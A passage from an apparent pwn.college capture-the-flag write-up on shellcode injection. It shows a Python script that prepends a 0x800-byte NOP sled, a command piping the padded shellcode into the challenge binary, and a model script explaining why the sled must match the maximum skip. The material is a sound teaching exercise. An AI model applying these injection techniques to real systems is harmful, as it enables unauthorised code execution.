srand(time(0)); if (rand() %2) hello(bye1,name); else hello(name , bye2); } //this program will execute what we input as it mistook the order of char* and func :P
Back to level1: the given program will execute the shellcode we inject. Let's see what happens:

```
//terminal
cat: flag: Permission denied
sudo cat flag
sudo: effective uid is not 0, is sudo installed setuid root?
```
Although we got a shell, it is not running as root, so the flag is still unreadable.
On to level2. As the challenge description says, this level will randomly skip up to 0x800 bytes of our shellcode before executing it, so the first bytes of our payload may never run.
We will get past this with a NOP sled: a run of NOP instructions placed in front of the real shellcode.
NOP (opcode 0x90 on x86) performs no operation; the CPU simply advances to the next instruction. Wherever execution lands inside the sled, it slides down through the remaining NOPs into the shellcode, so a sled of at least 0x800 bytes covers every possible skip.
This is my solution:
```python
# define the "\x90" (nop) padding: 0x800 bytes, the most the challenge can skip
nop_padding = b'\x90' * 0x800

# path of the shellcode-raw file
input_file_path = 'shellcode-raw'  # replace with your file path

# read the original shellcode bytes
with open(input_file_path, 'rb') as input_file:
    original_content = input_file.read()

# prepend 0x800 bytes of "\x90" to the shellcode
new_content = nop_padding + original_content

# overwrite the file in place with the padded shellcode
with open(input_file_path, 'wb') as output_file:
    output_file.write(new_content)
```
This Python script prepends the NOP sled to shellcode-raw in place (run it only once, otherwise a second sled is stacked on top of the first). Then we execute the following command:

```
(cat shellcode-raw ; cat) | ./babyshell_level2
```
The program prints our input back as a long run of nop instructions that scrolls quickly down the screen. Whatever offset the challenge skips to lands inside the sled, execution slides over the remaining NOPs, and the program runs our actual shellcode.
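To see why the sled has to be at least as long as the maximum skip, and why it must be built from single-byte NOPs, here is a small model of the level2 behaviour. This is an added example for this write-up, not code from pwn.college or the challenge binary: it never runs the binary, it only checks, for every skip value, where execution would land in a sled + shellcode payload. The skip model (entry point moved forward by N bytes, 0 <= N <= 0x800) is an assumption taken from the challenge description as quoted above, and `FAKE_SHELLCODE` is a constructed byte string standing in for shellcode-raw, not a working payload.

```python
"""Model of the level2 'randomly skip up to 0x800 bytes' behaviour.

Added example for this write-up, not code from pwn.college or the challenge.
Assumption: the challenge moves the entry point forward by N bytes, with
0 <= N <= MAX_SKIP, and executes from there.
"""
import random

MAX_SKIP = 0x800            # "up to 0x800 bytes", from the level2 description
NOP = b"\x90"               # single-byte x86 nop, what the padding script uses
NOP3 = b"\x0f\x1f\x00"      # a multi-byte x86 nop, used to show the pitfall

# Constructed stand-in for shellcode-raw: arbitrary bytes, not a real payload.
FAKE_SHELLCODE = bytes(range(0x41, 0x51))   # b'ABCDEFGHIJKLMNOP'


def build_payload(shellcode: bytes, sled_len: int = MAX_SKIP, nop: bytes = NOP) -> bytes:
    """Sled followed by shellcode, the same layout the padding script writes."""
    if sled_len % len(nop):
        raise ValueError("sled length must be a multiple of the nop encoding length")
    return nop * (sled_len // len(nop)) + shellcode


def landing(payload: bytes, skip: int, sled_len: int, nop: bytes = NOP) -> str:
    """Classify where execution starts when the first `skip` bytes are skipped.

    'nop'       : on a nop boundary inside the sled, so it slides to the shellcode
    'shellcode' : exactly on the shellcode's first byte
    'mid-insn'  : inside a multi-byte nop encoding; the CPU would decode the
                  trailing bytes as something else (counted as failure)
    'past-sled' : inside the shellcode, past its first byte (broken)
    'past-end'  : beyond the payload entirely
    """
    if skip >= len(payload):
        return "past-end"
    if skip == sled_len:
        return "shellcode"
    if skip > sled_len:
        return "past-sled"
    return "nop" if skip % len(nop) == 0 else "mid-insn"


def first_failing_skip(shellcode: bytes, sled_len: int, nop: bytes = NOP,
                       max_skip: int = MAX_SKIP):
    """Smallest skip in [0, max_skip] that does not reach the shellcode intact,
    or None if every skip is survived."""
    payload = build_payload(shellcode, sled_len, nop)
    for skip in range(max_skip + 1):
        if landing(payload, skip, sled_len, nop) not in ("nop", "shellcode"):
            return skip
    return None


def survives_every_skip(shellcode: bytes, sled_len: int, nop: bytes = NOP,
                        max_skip: int = MAX_SKIP) -> bool:
    return first_failing_skip(shellcode, sled_len, nop, max_skip) is None


def pad_file(src: str, dst: str, sled_len: int = MAX_SKIP) -> int:
    """Write sled + contents of src to dst. Writing to a different file means
    re-running does not stack a second sled on the first. Returns bytes written."""
    with open(src, "rb") as f:
        payload = build_payload(f.read(), sled_len)
    with open(dst, "wb") as f:
        return f.write(payload)


if __name__ == "__main__":
    print("0x800 x 0x90 sled, first failing skip:",
          first_failing_skip(FAKE_SHELLCODE, 0x800))          # None
    print("0x400 x 0x90 sled, first failing skip:",
          first_failing_skip(FAKE_SHELLCODE, 0x400))          # 1025 (0x401)
    print("3-byte nop sled, first failing skip:",
          first_failing_skip(FAKE_SHELLCODE, 0x801, NOP3))    # 1
    # One random skip, the way the challenge would pick it.
    skip = random.randint(0, MAX_SKIP)
    print(f"random skip {skip:#x} lands on:",
          landing(build_payload(FAKE_SHELLCODE), skip, 0x800))
```

The second and third cases are the two ways a sled goes wrong: a sled shorter than the maximum skip lets execution start inside the shellcode, and a sled built from multi-byte NOPs can be entered at a byte that is not an instruction boundary, since the skip is byte-granular. A sled of 0x800 single-byte 0x90s, as in the padding script, survives every skip from 0 to 0x800 inclusive.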